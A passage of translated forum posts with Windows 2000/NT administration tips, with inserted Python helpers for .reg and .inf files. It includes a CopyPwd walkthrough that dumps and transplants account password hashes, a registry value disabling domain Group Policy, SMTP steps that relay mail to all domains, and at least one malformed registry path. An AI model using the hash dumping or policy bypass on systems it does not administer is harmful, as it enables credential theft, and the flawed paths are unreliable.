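    if not body or body[0] not in HEADERS:
        raise ValueError("missing .reg header line; regedit would refuse the file")
    ops, key, i = [], None, 0
    while i < len(lines):
        line = lines[i].strip(); i += 1
        while line.endswith("\\") and i < len(lines):    # continued hex data
            line = line[:-1] + lines[i].strip(); i += 1
        if not line or line.startswith(";") or line in HEADERS:
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1]
            if name.startswith("-"):
                ops.append(("delete_key", name[1:])); key = None
            else:
                key = name; ops.append(("create_key", key))
            continue
        m = VALUE_LINE.match(line)
        if not m or key is None:
            raise ValueError("unexpected line: %r" % line)
        vname = "" if m.group(2) else unescape(m.group(1))   # "@" is the default value
        typ, data = parse_data(m.group(3))
        if typ == "delete":
            ops.append(("delete_value", key, vname))
        else:
            ops.append(("set_value", key, vname, typ, data))
    return ops

def destructive(ops: list) -> list:
    """Operations worth a second look before import: key and value deletions."""
    return [op for op in ops if op[0] in ("delete_key", "delete_value")]
```

Listing destructive(ops) before importing a file from a third party is the quick check: a `[-HKEY_...]` line removes the whole subtree, and nothing in the file format distinguishes "create a key" from "touch an existing key".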
How can Active Directory use a single port for domain replication?
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:59

AD domain replication uses dynamic RPC, so the port is not fixed, which makes firewall deployment awkward; but we can make domain replication use a single port by modifying the Domain Controller's registry:

HKLM\CurrentControlSet\Service\NTDS\Parameters

Add a new value named "TCP/IP Port", set it to the port you want (preferably above 1024), then restart the machine.
Creating shortcuts to register and unregister DLL files
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:58

DLL files Register and Unregister

Some programmers frequently need to register or unregister DLL files they have written; adding a shortcut reduces the work:

Windows Registry Editor Version 5.00

; a shell verb's command line lives in the default value of its "command" subkey;
; %1 is quoted so paths containing spaces still work
[HKEY_CLASSES_ROOT\dllfile\shell\Unregister\command]
@="regsvr32 \"%1\" /u"

[HKEY_CLASSES_ROOT\dllfile\shell\Register\command]
@="regsvr32 \"%1\""

When we need to register or unregister a DLL, just right-click the DLL file!
Where NT stores its registry files
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:57

The %system%\system32\config directory contains the following files

sam.*        Security Account Manager

default.*    default registry file

security.*   security registry file

system.*     system registry file

software.*   application software registry file


The most important registry files are those without an extension, i.e. the current registry files. There is also a file named system.alt, which is a copy of the registry.


The files with the .log or .sav extension in %system%\system32\config contain historical information and can be examined with a time browser. For example, the .sav files were saved during the last normal system boot, while the .log files record the changes made to the registry while registry auditing was enabled.

Although you can delete the .log and .sav files, I would not want you to begrudge that little bit of disk space.

Note: do not replace just one or a few of the registry files; this puts the registry files out of sync and can very easily crash the system.

Disabling domain Group Policy
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:56

 


Hive: HKEY_LOCAL_MACHINE

Key: Software\Policies\Microsoft\Windows\System

Name: DisableGPO

Type: REG_DWORD

Value: 1

Windows 2000 registry data types
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:55

 


Data Types in the Windows 2000 Registry


Data types define what kind of data an entry can store. The following data types are used by entries in the Windows 2000 registry:


REG_BINARY

Raw binary data. Most hardware component information is stored as binary data. It can be displayed in an easy-to-read format by using Windows 2000 Diagnostics. REG_BINARY data can be displayed and entered in binary or hexadecimal format in a registry editor.

For example,

PagingFiles.

HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

Data type     Range                                  Default value
REG_BINARY    Name, Minimum (MB), Maximum (MB)       C:\Pagefile.sys 27 77


REG_DWORD

Data represented by a number that is 4 bytes (32 bits) long. Boolean (0 or 1) values and many entries for device drivers and services take this data type. REG_DWORD data can be displayed in binary, hexadecimal, or decimal format in a registry editor.

For example,

ActivityLogFlag

HKLM\SYSTEM\CurrentControlSet\Services\DhcpServer\Parameters

Data type     Range         Default value

REG_DWORD      0 | 1          0 


REG_DWORD_LITTLE_ENDIAN

Same as REG_DWORD. A 32-bit number in which the most significant byte is displayed as the leftmost or high-order byte. This is the most common format for storing numbers in computers running Windows 2000 and Windows 98.


REG_DWORD_BIG_ENDIAN

A 32-bit number in which the most significant byte is displayed as the rightmost or low-order byte. This is opposite of the order in which bytes are stored in the REG_DWORD and REG_DWORD_LITTLE_ENDIAN data types.


REG_EXPAND_SZ

A variable-length text string. REG_EXPAND_SZ data can include variables that are resolved when an application or service uses the data. For example, the value of File includes the variable Systemroot.


For Example,

When the Event Log service references the File entry, this variable is replaced by the name of the directory containing the Windows 2000 system files.

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\File Replication Service

File entry:

Data type     Range             Default value

REG_EXPAND_SZ      Path and file name %SystemRoot%\system32\config\NtFrs.Evt


REG_LINK

Indicates a symbolic link between system or application data and a registry value. You can use Unicode characters in a REG_LINK entry.


REG_MULTI_SZ

Multiple text strings formatted as an array of null-terminated strings, and terminated by two null characters. Values that contain lists or multiple values in a form that people can read usually take this data type. The values in a REG_MULTI_SZ entry can be separated by spaces, commas or other marks.

For example, the value of Machine is a list of paths accessible by all remote users of Windows 2000.

HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths

Machine

Data type       Range            Default value
REG_MULTI_SZ    Registry paths   SYSTEM\CurrentControlSet\Control\ProductOptions
                                 SYSTEM\CurrentControlSet\Control\Print\Printers
                                 SYSTEM\CurrentControlSet\Services\Eventlog
                                 SOFTWARE\Microsoft\Windows NT\CurrentVersion


REG_SZ

A fixed-length text string. Boolean ("True" or "False") values and other short text values usually have this data type.

For example,

Wallpaper

HKCU\Control Panel\Desktop


Data type     Range                              Default value
REG_SZ        [Path]File name | (Blank value)    (Blank value)


REG_FULL_RESOURCE_DESCRIPTOR

A series of nested arrays designed to store a resource list for a hardware component or driver. For example, in Regedt32, double-click ConfigurationData (in HKEY_LOCAL_MACHINE\Hardware\Description\System \MultifunctionAdapter\0\ControllerName\0).
regedit.exe parameters
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:55

filename      import a .reg file into the registry

/s            import a .reg file into the registry (silent mode)

/e            export a registry file

              e.g.: regedit /e filename.reg HKEY_LOCAL_MACHINE\SYSTEM

/L:system     specify system.dat

/R:user       specify user.dat

/C            compress [filename] (Windows 98)


Some other switches can be used too, such as /a, but when I tried them the functionality turned out to be nothing more than the above; what's more, experimenting with switches can easily double the size of your registry, which is really a dangerous exercise.

It will not crash the system though, so those of you who are brave enough, go ahead and try!
Recovering passwords after reinstalling Windows 2000
Author: Adam
  Date: 2002-2-3 2:35:47

In day-to-day Windows 2K administration we inevitably run into having to reinstall Windows 2K. Data can be backed up in many ways, and user attributes can be backed up with ADSI scripts or with the Addusers tool (see the Windows 2000 Resource Kit), but user passwords may have to be set again; on a server with hundreds of users, the users' complaints put a lot of pressure and trouble on the administrator. So here I recommend a nice tool, CopyPwd, for backing up user passwords.
Download:
http://www.sometips.com/soft/copypwd.zip
(The foreigners are impressive: they finished developing this thing in little more than a week, source code included)

The two machines used for the experiment: a Chinese Windows 2000 Server (named S1) and a Chinese Windows 2000 Pro (named S2), both standalone. The tool can of course also be used on standalone NT4 machines and in domains, but I have not tested that.

Enough talk, let's start the experiment. First, on S1:

D:\copypwd>net user adam ILoveAdam! /add
命令成功完成。
//create user adam with password "ILoveAdam!"

D:\copypwd>copypwd.exe dump > copypwd.txt
//dump the passwords of all users on S1; do not change the file name copypwd.txt. By the way, if this step cannot be completed on your machine, you can leave this page and continue roaming the boundless Internet; forget me, like the little flower that opened outside your window this morning... :)

D:\copypwd>notepad copypwd.txt
//edit copypwd.txt: delete the lines unrelated to adam and save. Since we are testing with only one user, we kept only the adam line; if you need to back up several users, keep the lines for those users

咱們將操做轉移到 S2 上,首先咱們能夠測試一下 S2 上是否能夠執行 copypwd dump,若是不行,你就自認倒黴吧,至於爲何有的機器能執行有的機器不能執行不在本文討論範圍之列,你們能夠與 PWDump的做者-Jeremy Allison <jra@cygnus.com> 聯繫。

C:\>net user adam ILoveAdam! /add
命令成功完成。
//create an adam account. Here we created it with net user; we could also use AddUsers, which preserves more user-related information; for AddUsers usage see the Windows 2000 Resource Kit manual.

C:\>copy \\192.168.X.X\copypwd\copypwd.txt .
已複製         1 個文件。
//copy the backed-up copypwd.txt to S2

C:\>copypwd.exe set
Set password for user adam
//password restored; whatever password you set when creating the user on S2, it is now "ILoveAdam!"

One thing to note: after we carry out this operation, the user's "User must change password at next logon" flag is enabled, which causes problems during testing, so we must uncheck this option in User Manager. Of course this can also be done from the command line, so here I recommend a Resource Kit tool, cusrmgr; first let's look at its help:

CUsrMgr Ver 1.0 Jan98 by G.Zanzen (c) MCS Central Europe
Sets a random password to a user
usage: -u UserName [-m \\MachineName] \\ default LocalMachine
  Resetting Password Function
       -p Set to a random password
       -P xxx Sets password to xxx
  User Functions
       -r xxx Renames user to xxx
       -d xxx deletes user xxx
  Group Functions
       -rlg xxx yyy Renames local group xxx to yyy
       -rgg xxx yyy Renames global group xxx to yyy
       -alg xxx Add user (-u UserName) to local group xxx
       -agg xxx Add user (-u UserName) to global group xxx
       -dlg xxx deletes user (-u UserName) from local group xxx
       -dgg xxx deletes user (-u UserName) from global group xxx
  SetProperties Functions
       -c xxx sets Comment to xxx
       -f xxx sets Full Name to xxx
       -U xxx sets UserProfile to xxx
       -n xxx sets LogonScript to xxx
       -h xxx sets HomeDir to xxx

       -H x   sets HomeDirDrive to x

       +s xxxx sets property xxxx
       -s xxxx resets property xxxx
       where xxxx can be any of the following properties:
              MustChangePassword
              CanNotChangePassword
              PasswordNeverExpires
              AccountDisabled
              AccountLockout
              RASUser
[Old habit: when the word count is short, pad it with help output]

The syntax to clear the flag for our user is:

D:\copypwd>cusrmgr -u adam -s MustChangePassword

這樣,咱們的操做就完成了...

【後記】
須要感謝的是 Chuck McCullough<chuck@systemtools.com>,偶這個想法在多年前就有了,該死的一直叮叮不幫我寫代碼,而Shotgun這個鳥人如今號稱只作開發管理,再也不Coding,因此只有靠老外了...你們有興趣也能夠研究一下老外的代碼...有什麼心得也可讓偶學習學習...

Windows NT 4.0: when installing SP5/SP6 the system reports that a higher-grade encryption package is in use and aborts the Service Pack installation?
Author: Adam
  Date: 2002-1-13 18:35:04

If you install IE 5.5 or later on Windows NT 4.0 and then install a Service Pack, you receive the following error:

You have chosen to install a version of the Service Pack with Standard Encryption onto a system with High Encryption. This is not supported. To successfully install this version of the Service Pack, you must install the High Encryption version. Press Help for more information about obtaining the High Encryption Version of this Service Pack. Service Pack Setup will now exit.

Someone on the forum previously suggested replacing schannel.dll in %systemroot%\system32 with an earlier version of the DLL so that the install proceeds, but if the company you manage has 10 or more such Windows NT machines that greatly increases your workload, so I recommend the following method instead:

1. First extract the Service Pack (run SP5.exe /x and specify c:\temp\sp as the directory)

2. Edit the file c:\temp\sp\i386\update\update.inf

3. Find [CheckSecurity.System32.files]

4. Put a semicolon in front of the following lines

       Schannel.dll
       Security.dll
       Ntlmssps.dll

5. Install the Service Pack with update.exe
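Steps 2 to 4 above as a script, added here as an example (not the article's own code): it comments out the named entries in one section of an .inf file and leaves everything else alone, so the same edit can be applied to every extracted Service Pack in a fleet. SAMPLE_INF is a constructed stand-in for update.inf; only the section name and the three file names come from the article, while "Other.d ll" and "SomeOtherSection" are made up to show that the edit stays inside the section.

```python
"""Section-scoped commenting of .inf entries (added example).
SAMPLE_INF is constructed; it is not Microsoft's update.inf."""
import re

SECTION = "CheckSecurity.System32.files"
FILES_TO_SKIP = {"Schannel.dll", "Security.dll", "Ntlmssps.dll"}

SAMPLE_INF = """[Version]
Signature="$Windows NT$"

[CheckSecurity.System32.files]
Schannel.dll
Security.dll
Ntlmssps.dll
Other.dll

[SomeOtherSection]
Schannel.dll
"""

def _with_sections(lines):
    """Yield (current section name in lower case or None, line) for every line."""
    current = None
    for line in lines:
        m = re.match(r"\[(.+)\]\s*$", line.strip())
        if m:
            current = m.group(1).lower()
        yield current, line

def _is_entry(stripped: str) -> bool:
    return bool(stripped) and not stripped.startswith((";", "["))

def comment_out(inf_text: str, section: str, files) -> str:
    """Prefix the named entries of one section with ';'; idempotent."""
    wanted = {f.lower() for f in files}
    out = []
    for current, line in _with_sections(inf_text.splitlines()):
        stripped = line.strip()
        if current == section.lower() and _is_entry(stripped):
            # entries may carry ",flags" after the file name
            if stripped.split(",")[0].strip().lower() in wanted:
                line = ";" + line
        out.append(line)
    return "\n".join(out) + ("\n" if inf_text.endswith("\n") else "")

def active_entries(inf_text: str, section: str) -> list:
    """Entries of a section that are still uncommented; used to verify the edit."""
    return [line.strip() for current, line in _with_sections(inf_text.splitlines())
            if current == section.lower() and _is_entry(line.strip())]
```

Running active_entries() on the result before and after the edit is the check to keep: the three security DLLs must disappear from the named section and nothing else in the file may change.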

How to create a tftp service for Windows 2000
Author: Adam
  Date: 2002-1-13 18:35:04

Lately I keep seeing people on the forum ask how to start the TFTP service under Win2K. By default the TFTP service is not installed at all; it is only installed when the RIS service is used (few people in China use that thing; maybe I am the frog at the bottom of the well). Now I will show how to install a tftp service (if you need one; are you a network administrator, or an XX?)

First locate the tftpd.exe file on the system; it can usually be found in %systemroot%\system32\dllcache. I suggest copying the file to another directory.

C:\>copy %systemroot%\system32\dllcache\tftpd.exe %systemroot%\system32
已複製         1 個文件。

We'll use instsrv, a tool from the Windows 2000 Resource Kit, to create a service; instsrv's usage is shown below. Of course, other tools work too (e.g. srvinstw, which is GUI based).
C:\>instsrv
Installs and removes system services from NT

INSTSRV <service name> (<exe location> | REMOVE)
  [-a <Account Name>] [-p <Account Password>]

  Install service example:

    INSTSRV MyService C:\MyDir\DiskService.Exe
    -OR-
    INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo

  Remove service example:

    INSTSRV MyService REMOVE
[My trademark: not enough words, pad with help output!]

Add a service; note that the service is created with startup type Automatic.
C:\>instsrv tftp c:\winnt\system32\tftpd.exe
The service was successfuly added!

Make sure that you go into the Control Panel and use
the Services applet to change the Account Name and
Password that this newly installed service will use
for its Security Context.

Start the service
C:\>net start tftp
tftp 服務正在啓動 .
tftp 服務已經啓動成功。

Test whether the service works
C:\>tftp -i 61.135.21.195 PUT sometips.gif sometips.gif
Transfer successful: 4209 bytes in 1 second, 4209 bytes/s

C:\>dir tftpdroot
驅動器 C 中的卷是 C
卷的序列號是 1E23-1907

C:\tftpdroot 的目錄

2001-09-22  01:14       <DIR>          .
2001-09-22  01:14       <DIR>          ..
2001-09-22  01:14                4,209 sometips.gif
               1 個文件          4,209 字節
               2 個目錄     94,113,792 可用字節

Note: when you upload a file, the system automatically creates a directory named tftproot on %systemdrive%. OK, all the work is done!

Enjoy it!

Note: I could not find any related material online. I suspect tftpd has a few more parameters, e.g. for specifying the tftproot directory; I tried the parameters of in.tftpd under Unix without success; test it yourselves if you are interested! :)


Why is browsing Network Neighborhood slow? How to fix it?
Author: momo
  Date: 2002-1-13 18:35:03

Answer: because when browsing other computers through Network Neighborhood, 2000 first searches its own shared folders, the printers that can be shared on the network, and the network-related jobs in Scheduled Tasks, which makes it slow.

Start the registry editor regedit

Find HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace
Delete {2227A280-3AEA-1069-A2DE-08002B30309D} (printers)
Delete {D6277990-4C6A-11CF-8D87-00AA0060F5BF} (scheduled tasks)
Next time you open it you will find it much faster than before.

Netlogon Error Message
Author: Feras Sabha
  Date: 2002-1-13 18:35:03

 


We recently enhanced our network with switched Ethernet technology. All the servers and workstations in the network run Windows NT 4.0 with the latest service pack. Although this enhancement provided a faster network, it presented a problem that hadn't previously occurred.

When booted, some of the faster workstations in the network (Pentium III processor—class systems) reported a Netlogon error (event ID 5719—No Windows NT Domain Controller is available for domain) in the System event log. Sometimes, if the user logged off and logged on again without restarting the computer, all services would start without problems. None of the slower computers produced this error message.

After trying workarounds such as upgrading the NIC software, I hadn't found a solution. Finally, I came across the Microsoft article "Increase Domain Logon Timeout over Network" (http://support.microsoft.com/support/kb/articles/q163/2/04.asp), which provided a solution: Use a registry editor to add the ExpectedDialupDelay parameter of type REG_DWORD to the HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Services\Netlogon\Parameters subkey. This value has a range of 0 to 600 seconds. To find the right timeout value, I experimented a bit and came up with a value for my network of from 4 to 8 seconds. My theory is that this logon delay is necessary to let the switches build entries in their routing tables as soon as the client starts.

Installing IIS 5.0 DIY
Author: Adam
  Date: 2002-1-13 18:35:02

When installing Windows 2000, if you choose to install IIS, setup creates an InetPub directory on your %SystemDrive%, and under Inetpub a Scripts directory; IIS also creates a virtual directory SCRIPTS pointing to that directory and gives it execute permission. Most of the problems with the "Unicode decoding directory traversal vulnerability" found a while ago by the NSFocus security team concern the executable directories of a web site, so we recommend moving that directory off the system drive, which provides a certain degree of security.

However, when selecting system components during setup you cannot choose the drive IIS is installed on yourself, hence this article. :)

Do not install IIS during system setup; do it by hand after setup completes, using an unattended installation to customise the IIS 5.0 install. First make sure your Windows 2000 installation media is available; in this example the media is the CD-ROM, so just insert it into the drive. Then create an unattended-setup answer file on your hard disk or a floppy; in this example we create D:\IIS5install.txt as the answer file, with the following content:

[Components]                         ; components to install
iis_common = on                      ; common files
iis_inetmgr = on                     ; IIS manager
iis_www = on                         ; WWW service
iis_ftp = on                         ; FTP service
iis_htmla = on                       ; web-based IIS manager

[InternetServer]
Path="D:\inetsrv"                    ; where the common files go (if you uninstalled IIS and reinstall by hand, the common files stay where they were)
PathFTPRoot="D:\inetPub\FTPRoot"     ; FTP root path
PathWWWRoot="D:\InetPub\wwwroot"     ; WWW root path

Save the file and run "sysocmgr /i:%windir%\inf\sysoc.inf /u:d:\iis5install.txt".
No prompt appears; the system installs IIS for you automatically, the Scripts directory ends up on drive D:, and the "Unicode decoding directory traversal vulnerability" no longer works.

If you need to install more IIS components, here is a more detailed unattended answer file:

=========================================BEGIN============================

;This is an example Unattended installation file
;IIS, MTS, and Index Server are ON
;Target Path should be new directory
;Adminpassword is blank.

[Unattended]
Unattendmode = FullUnattended
OemPreinstall = NO
TargetPath = *
Filesystem = LeaveAlone

[UserData]
FullName = "Your User Name"
OrgName = "Your Organization Name"
ComputerName = "ComputerName"

[GuiUnattended]
TimeZone = "004"
AdminPassword = *
AutoLogon = Yes

[LicenseFilePrintData]
AutoMode = "PerServer"
AutoUsers = "0"

[Display]
BitsPerPel = 4
XResolution = 800
YResolution = 600
VRefresh = 70

[Networking]
InstallDefaultComponents = YES

[Identification]
JoinWorkgroup = Workgroup

;Turns NT Components (and their respective sections) ON or OFF
[Components]
iis_common = on
iis_inetmgr = on
iis_www = on
iis_ftp = on
iis_htmla = on
iis_doc = on
iis_pwmgr = on
iis_smtp = on
iis_smtp_docs = on
mts_core = on
msmq = off
terminalservices = off
reminst = off
certsrv = off
rstorage = off
indexsrv_system = on
certsrv_client = off
certsrv_server = off
certsrv_doc = off

[InternetServer]
;Without these keys specified IIS will use the default settings
; Note that the Path is location for INETSRV, the core IIS programs and files.
Path=D:\Securelocation
PathFTPRoot=E:\Inetpub\Ftproot
PathWWWRoot=E:\Inetpub\Wwwroot

All server-side variables supported by IE5
Author: MSDN
  Date: 2002-1-13 18:35:01

Below are all the server-side variables supported by IE5, as given in MSDN (April 1999 edition)

Some variables are not supported in earlier versions, and they may change in later versions


Variable             Description
ALL_HTTP             All HTTP headers sent by the client.
ALL_RAW              Retrieves all headers in raw form. The difference between
                     ALL_RAW and ALL_HTTP is that ALL_HTTP places an HTTP_ prefix
                     before the header name and the header name is always
                     capitalized. In ALL_RAW the header name and values appear
                     as they are sent by the client.
APPL_MD_PATH         Retrieves the metabase path for the (WAM) Application for
                     the ISAPI DLL.
APPL_PHYSICAL_PATH   Retrieves the physical path corresponding to the metabase
                     path. IIS converts the APPL_MD_PATH to the physical
                     (directory) path to return this value.
AUTH_PASSWORD        The value entered in the client's authentication dialog.
                     This variable is only available if Basic authentication
                     is used.
AUTH_TYPE            The authentication method that the server uses to validate
                     users when they attempt to access a protected script.
AUTH_USER            Raw authenticated user name.
CERT_COOKIE          Unique ID for the client certificate, returned as a string.
                     Can be used as a signature for the whole client certificate.
CERT_FLAGS           bit0 is set to 1 if the client certificate is present.
                     bit1 is set to 1 if the Certificate Authority of the client
                     certificate is invalid (not in the list of recognized CAs
                     on the server).
CERT_ISSUER          Issuer field of the client certificate (O=MS, OU=IAS,
                     CN=user name, C=USA).
CERT_KEYSIZE         Number of bits in the Secure Sockets Layer connection key
                     size. For example, 128.
CERT_SECRETKEYSIZE   Number of bits in the server certificate private key.
                     For example, 1024.
CERT_SERIALNUMBER    Serial number field of the client certificate.
CERT_SERVER_ISSUER   Issuer field of the server certificate.
CERT_SERVER_SUBJECT  Subject field of the server certificate.
CERT_SUBJECT         Subject field of the client certificate.
CONTENT_LENGTH       The length of the content as given by the client.
CONTENT_TYPE         The data type of the content. Used with queries that have
                     attached information, such as the HTTP queries GET, POST,
                     and PUT.
GATEWAY_INTERFACE    The revision of the CGI specification used by the server.
                     The format is CGI/revision.
HTTP_<HeaderName>    The value stored in the header HeaderName. Any header other
                     than those listed in this table must be prefixed by HTTP_
                     in order for the ServerVariables collection to retrieve its
                     value.
                     Note: the server interprets any underscore (_) characters
                     in HeaderName as dashes in the actual header. For example,
                     if you specify HTTP_MY_HEADER, the server searches for a
                     header sent as MY-HEADER.
HTTP_ACCEPT          Returns the value of the Accept header.
HTTP_ACCEPT_LANGUAGE Returns a string describing the language to use for
                     displaying content.
HTTP_USER_AGENT      Returns a string describing the browser that sent the
                     request.
HTTP_COOKIE          Returns the cookie string that was included with the
                     request.
HTTP_REFERER         Returns a string containing the URL of the original request
                     when a redirect has occurred.
HTTPS                Returns ON if the request came in through a secure channel
                     (SSL) or OFF if the request is for a non-secure channel.
HTTPS_KEYSIZE        Number of bits in the Secure Sockets Layer connection key
                     size. For example, 128.
HTTPS_SECRETKEYSIZE  Number of bits in the server certificate private key.
                     For example, 1024.
HTTPS_SERVER_ISSUER  Issuer field of the server certificate.
HTTPS_SERVER_SUBJECT Subject field of the server certificate.
INSTANCE_ID          The ID for the IIS instance in textual format. If the
                     instance ID is 1, it appears as a string. You can use this
                     variable to retrieve the ID of the Web-server instance (in
                     the metabase) to which the request belongs.
INSTANCE_META_PATH   The metabase path for the instance of IIS that responds to
                     the request.
LOCAL_ADDR           Returns the server address on which the request came in.
                     This is important on multihomed machines where there can be
                     multiple IP addresses bound to a machine and you want to
                     find out which address the request used.
LOGON_USER           The Windows NT® account that the user is logged into.
PATH_INFO            Extra path information as given by the client. You can
                     access scripts by using their virtual path and the
                     PATH_INFO server variable. If this information comes from
                     a URL, it is decoded by the server before it is passed to
                     the CGI script.
PATH_TRANSLATED      A translated version of PATH_INFO that takes the path and
                     performs any necessary virtual-to-physical mapping.
QUERY_STRING         Query information stored in the string following the
                     question mark (?) in the HTTP request.
REMOTE_ADDR          The IP address of the remote host making the request.
REMOTE_HOST          The name of the host making the request. If the server
                     does not have this information, it will set REMOTE_ADDR
                     and leave this empty.
REMOTE_USER          Unmapped user-name string sent in by the user. This is the
                     name that is really sent by the user as opposed to the ones
                     that are modified by any authentication filter installed
                     on the server.
REQUEST_METHOD       The method used to make the request. For HTTP, this is GET,
                     HEAD, POST, and so on.
SCRIPT_NAME          A virtual path to the script being executed. This is used
                     for self-referencing URLs.
SERVER_NAME          The server's host name, DNS alias, or IP address as it
                     would appear in self-referencing URLs.
SERVER_PORT          The port number to which the request was sent.
SERVER_PORT_SECURE   A string that contains either 0 or 1. If the request is
                     being handled on the secure port, then this will be 1.
                     Otherwise, it will be 0.
SERVER_PROTOCOL      The name and revision of the request information protocol.
                     The format is protocol/revision.
SERVER_SOFTWARE      The name and version of the server software that answers
                     the request and runs the gateway. The format is
                     name/version.
URL                  Gives the base portion of the URL.

How to use the SMTP Service bundled with IIS 5.0 as your company's SMTP server
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:35:01

I happened to see someone ask about this today, so I ran a small experiment; the setup is actually very simple.

Open the IIS manager -> Default SMTP Virtual Server -> Domains

1. Right-click "Domains" -> New -> Domain -> choose Remote, Next -> enter *.com as the name -> Finish

2. Right-click *.com -> Properties -> General -> check "Allow incoming mail to be relayed to this domain" -> OK

Repeat Step 1 and Step 2, replacing com with net, org, cn, tw and so on.

Now you can send mail to whichever domains you want. Admittedly this is a clumsy method, but it works!

Try it now!

A complete guide to access control on the NNTP Server bundled with IIS 5.0
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:35:00

IIS 5.0 ships with an NNTP Server. It is simple to set up and meets most people's needs; our company also uses this rickety little thing. Because it offers very little access control, newsgroups that you would rather not make public cannot be hidden away. But remember: with Windows 2000 and NTFS, all of this becomes very simple...

Test environment:

Windows 2000 Server, running the NNTP Service

Create a newsgroup adam.test

Once the newsgroup is created, an adam\test directory appears under \Inetpub\nntpfile\root. By setting the NTFS permissions on these two directories we can control each newsgroup precisely. First, however, you need to do the following:

Internet Services Manager -> Default NNTP Virtual Server -> Properties -> Access -> uncheck "Allow anonymous"

Then create a group adam and put the appropriate users into it.

Set the permissions on the adam\test directory to System (F) and adam (F). Other users can then no longer access the newsgroup, while members of the adam group can post and read as before.

The client side needs configuring too, heh.

Taking Outlook Express as an example:

Create a news account, open its Properties -> Server -> check "This server requires me to log on" -> enter the user name and password.

All is OK...

Postscript:

Although this thing is simple to set up, administering it is very inconvenient, so I strongly recommend a newsgroup server package, DNews. The current version seems to be 5.4f3; it has a web interface, an administration port, and can even be administered directly over Telnet. Really cool... As for where to download it: http://netwinsite.com/ :)

How to write a security template (DIY permission settings: an introduction to SDDL)
Author: joyadam@myrealbox.com
  Date: 2002-4-10 0:16:52

Windows 2000 provides a centralized way of defining security through the "Security Templates" snap-in. For a network administrator, installing a system and configuring its security is no longer a tedious job: all that is needed is to maintain one security template file and apply it after the system is reinstalled or the template is updated.

A security template file is divided into many sections. The system ships with a number of template files in the %systemroot%\security\templates directory; have a look at the format of these inf files. They are powerful and can generally configure the following security policies of the system:

◆Account policies: security for passwords, account lockout and Kerberos policy
◆Local policies: user rights and auditing of security events.
◆Restricted groups: membership management for local groups
◆Registry: security of local registry keys
◆File system: security of the local file system
◆System services: security and startup mode of local services

What we discuss today is mainly how to set permissions on system objects: registry permissions, file and directory permissions, service permissions and so on (the rest can be handled through the GUI). This brings us to SDDL (Security Descriptor Definition Language). So what does SDDL look like? Take a look at the sample below.

Example:
"%systemroot%\system32\cmd.exe",0,"D:AR(D;OICI;FA;;;BG)"

This line belongs in the File Security section of the inf file. Its effect is to deny members of the Guests group access to cmd.exe. Some common vulnerabilities (such as the Unicode bug) abuse the IUSR_Machinename or IWAM_Machinename accounts to reach this file in unexpected ways and run unauthorized programs, and both of these accounts belong to the Guests group, so the point of the example should be clear. Now let's analyse the line. Two commas split it into three parts, explained below:

Part 1:
The file or directory name (obvious)

Part 2:
Three values can be chosen here:
0: configure this file or directory, then propagate the configured permissions to its subdirectories and files;
1: do not replace the existing permissions on this file, equivalent to cacls /e (if you don't know what cacls is, run cacls /? and see, or just treat this as my way of padding the word count)
2: configure this file or directory, then replace the permissions of all subdirectories and files that carry inherited permissions

Part 3:
This is the focus of the whole article: SDDL

First look at the first field of D:AR(D;OICI;FA;;;BG); here it is D.
The choices are:
(O:) owner, (G:) primary group, (D:) DACL, (S:) SACL. In other words, through the inf file we can set an object's Owner, Primary Group, DACL and SACL. By far the most common is the D shown above, which sets the file's discretionary access control list.

Now the second field, AR above. This field appears only when you set an ACL.
When setting the DACL, the choices are:
"P"--SE_DACL_PROTECTED flag, Protects the DACL of the security descriptor from being modified by inheritable ACEs.
"AR"--SE_DACL_AUTO_INHERIT_REQ flag, Requests that the provider for the object protected by the security descriptor automatically propagate the DACL to existing child objects. If the provider supports automatic inheritance, it propagates the DACL to any existing child objects, and sets the SE_DACL_AUTO_INHERITED bit in the security descriptors of the object and its child objects.
"AI"--SE_DACL_AUTO_INHERITED flag, Indicates a security descriptor in which the DACL is set up to support automatic propagation of inheritable ACEs to existing child objects. This bit is set only if the automatic inheritance algorithm has been performed for the object and its existing child objects.
This bit is not set in security descriptors for Windows NT versions 4.0 and earlier, which did not support automatic propagation of inheritable ACEs.

When setting the SACL, the choices are:
"P"--SE_SACL_PROTECTED flag, Protects the SACL of the security descriptor from being modified by inheritable ACEs.
"AR"--SE_SACL_AUTO_INHERIT_REQ flag, Requests that the provider for the object protected by the security descriptor automatically propagate the SACL to existing child objects. If the provider supports automatic inheritance, it propagates the SACL to any existing child objects, and sets the SE_SACL_AUTO_INHERITED bit in the security descriptors of the object and its child objects.
"AI"--SE_SACL_AUTO_INHERITED flag, Indicates a security descriptor in which the SACL is set up to support automatic propagation of inheritable ACEs to existing child objects. This bit is set only if the automatic inheritance algorithm has been performed for the object and its existing child objects.
This bit is not set in security descriptors for Microsoft Windows NT versions 4.0 and earlier, which did not support automatic propagation of inheritable ACEs.

Note: forgive me for not translating the text above; these things really cannot be expressed in Chinese, many of them have no authoritative translation, and I don't want to be laughed at.

OK, finally the most complex part, D;OICI;FA;;;BG, which five semicolons split into six fields.
Field 1: the ACE type. Here we use D; the choices are
"A"  ACCESS_ALLOWED
"D"  ACCESS_DENIED
"OA" OBJECT ACCESS ALLOWED
"OD" OBJECT ACCESS DENIED
"AU" AUDIT
"AL" ALARM
"OU" OBJECT AUDIT
"OL" OBJECT ALARM

Field 2: the ACE flags. Our value is OICI; the choices are
"CI" CONTAINER INHERIT
"OI" OBJECT INHERIT
"NP" NO PROPAGATE
"IO" INHERIT ONLY
"ID" INHERITED
"SA" AUDIT SUCCESS
"FA" AUDIT FAILURE

Field 3: the access rights. Our value is FA; the choices are
For directories:
"RP" READ
"WP" WRITE
"CC" CREATE CHILD
"DC" DELETE CHILD
